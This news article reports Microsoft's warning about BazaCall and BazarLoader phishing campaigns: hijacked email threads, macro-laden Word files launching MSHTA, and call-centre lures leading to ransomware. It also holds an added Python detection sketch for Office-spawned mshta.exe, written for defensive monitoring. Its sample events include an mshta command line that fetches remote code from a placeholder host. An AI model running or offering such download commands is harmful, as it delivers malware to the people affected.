Microsoft warns of new BazaCall malware campaign
The campaign uses fake copyright infringement emails and malicious files disguised as “stolen images”.
The Microsoft Security Intelligence team of cybersecurity experts has warned of a new malicious BazaCall campaign.
A recent campaign challenges the best practice of only opening emails from known contacts: it uses compromised accounts to hijack email threads and attach a Word document in a password-protected ZIP file. The doc has a macro that launches MSHTA to download BazarLoader. pic.twitter.com/JmHl3CLm9R
— Microsoft Security Intelligence (@MsftSecIntel) August 10, 2021
“We are monitoring several active email campaigns that use BazarLoader to deliver a wide range of payloads,” Microsoft said in a statement.
The campaign, dubbed Stolen Images, uses fake copyright infringement contact form emails and malicious files that allegedly contain “stolen images.” In this way, scammers try to trick users into downloading malware.
“The recent campaign challenges the best practice of opening emails only from known contacts by using compromised accounts to intercept conversations and attach a Word document in a password-protected ZIP file. The document contains a macro that launches MSHTA to load BazarLoader,” the experts explained.
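The chain described above (a Word macro starting MSHTA, which then fetches the loader) leaves a distinctive process-creation record: an Office application as the parent of mshta.exe. The following is an added detection sketch, not code from Microsoft or from the original article; the events are constructed samples using Sysmon Event ID 1 field names, and the `host` field, the parent list and the severity labels are assumptions made for the example.

```python
import ntpath
import re

# Office applications whose macros can start child processes (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws-01",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/page.hta"},
    {"host": "ws-02",  # admin tool started from the desktop: not flagged
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Tools\inventory.hta"},
    {"host": "ws-03",  # Word starting a print helper: not flagged
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 8192"},
    {"host": "ws-04",  # short path and upper-case names still match
     "ParentImage": r"C:\PROGRA~1\MICROS~1\Office16\winword.exe",
     "Image": r"C:\Windows\SysWOW64\MSHTA.EXE",
     "CommandLine": r'"C:\Windows\SysWOW64\MSHTA.EXE" "C:\Users\Public\doc.hta"'},
]

def basename(path):
    """Lower-cased file name of a Windows path, regardless of host OS."""
    return ntpath.basename(path or "").lower()

def triage(event):
    """Return an alert dict if an Office app started mshta.exe, else None."""
    if basename(event.get("Image")) != "mshta.exe":
        return None
    parent = basename(event.get("ParentImage"))
    if parent not in OFFICE_PARENTS:
        return None
    urls = URL_RE.findall(event.get("CommandLine", ""))
    # A remote URL on the command line matches the download step; rank it higher.
    return {"host": event.get("host"), "parent": parent,
            "remote_urls": urls, "severity": "high" if urls else "medium"}

def scan(events):
    """Triage every event and keep only the alerts."""
    return [alert for alert in map(triage, events) if alert]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```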
Microsoft raised the alarm about BazaCall due to unusual and relatively costly methods that relied on phishing emails claiming expired trial subscriptions and upcoming payments. The emails do not contain links to web pages and instead entice potential victims to contact the call centre, after which the operator provides instructions to install malware under the guise of helping to reverse the fraudulent payment.
The installed backdoor allows BazaCall members to install ransomware on the victim’s device.